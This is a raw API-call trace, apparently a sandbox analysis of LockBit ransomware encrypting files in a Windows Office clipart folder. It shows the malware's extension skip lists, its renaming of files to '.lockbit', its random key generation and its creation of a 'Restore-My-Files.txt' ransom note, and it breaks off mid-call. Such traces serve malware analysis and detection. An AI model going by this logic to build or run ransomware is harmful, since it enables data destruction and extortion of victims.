[0161.127] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.128] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.128] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.129] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.129] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382967.JPG") returned 1 [0161.129] lstrcmpiW (lpString1="ntldr", lpString2="J0382967.JPG") returned 1 [0161.129] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382967.JPG") returned 1 [0161.129] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382967.JPG") returned -1 [0161.130] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382967.JPG") returned -1 [0161.130] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382967.JPG") returned 1 [0161.130] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382967.JPG") returned -1 [0161.130] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.130] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG") returned=".JPG" [0161.130] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.130] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.130] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.130] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.130] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.130] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.130] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.131] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.131] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG.lockbit") returned 72 [0161.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382967.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.133] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.133] malloc (_Size=0x40068) returned 0x3df0008 [0161.133] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=93448) returned 1 [0161.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.134] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.134] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.140] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.140] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.144] free (_Block=0x1fa2ed8) [0161.144] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.144] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.144] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b75f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382968.JPG", cAlternateFileName="")) returned 1 [0161.144] lstrcmpiW (lpString1=".", lpString2="J0382968.JPG") returned -1 [0161.144] lstrcmpiW (lpString1="..", lpString2="J0382968.JPG") returned -1 [0161.145] PathFindExtensionW (pszPath="J0382968.JPG") returned=".JPG" [0161.145] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.145] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.145] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.146] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.146] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.147] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.147] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.147] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.147] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382968.JPG") returned 1 [0161.147] lstrcmpiW (lpString1="ntldr", lpString2="J0382968.JPG") returned 1 [0161.147] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382968.JPG") returned 1 [0161.147] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382968.JPG") returned -1 [0161.147] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382968.JPG") returned -1 [0161.147] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382968.JPG") returned 1 [0161.147] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382968.JPG") returned -1 [0161.147] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.147] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG") returned=".JPG" [0161.147] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.147] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.147] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.148] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.148] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.149] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.149] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG.lockbit") returned 72 [0161.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382968.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0161.150] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.150] malloc (_Size=0x40068) returned 0x3df0008 [0161.150] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=112479) returned 1 [0161.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.151] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0161.157] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.159] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.159] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.159] free (_Block=0x1fa2ed8) [0161.159] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.159] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.159] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.159] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1779f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382969.JPG", cAlternateFileName="")) returned 1 [0161.159] lstrcmpiW (lpString1=".", lpString2="J0382969.JPG") returned -1 [0161.160] lstrcmpiW (lpString1="..", lpString2="J0382969.JPG") returned -1 [0161.160] PathFindExtensionW (pszPath="J0382969.JPG") returned=".JPG" [0161.160] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.160] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.160] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.161] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.161] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382969.JPG") returned 1 [0161.161] lstrcmpiW (lpString1="ntldr", lpString2="J0382969.JPG") returned 1 [0161.161] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382969.JPG") returned 1 [0161.161] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382969.JPG") returned -1 [0161.161] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382969.JPG") returned -1 [0161.162] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382969.JPG") returned 1 [0161.162] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382969.JPG") returned -1 [0161.162] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.162] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG") returned=".JPG" [0161.162] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.162] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.162] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.163] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.163] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.163] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.163] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.163] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.163] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG.lockbit") returned 72 [0161.163] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382969.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 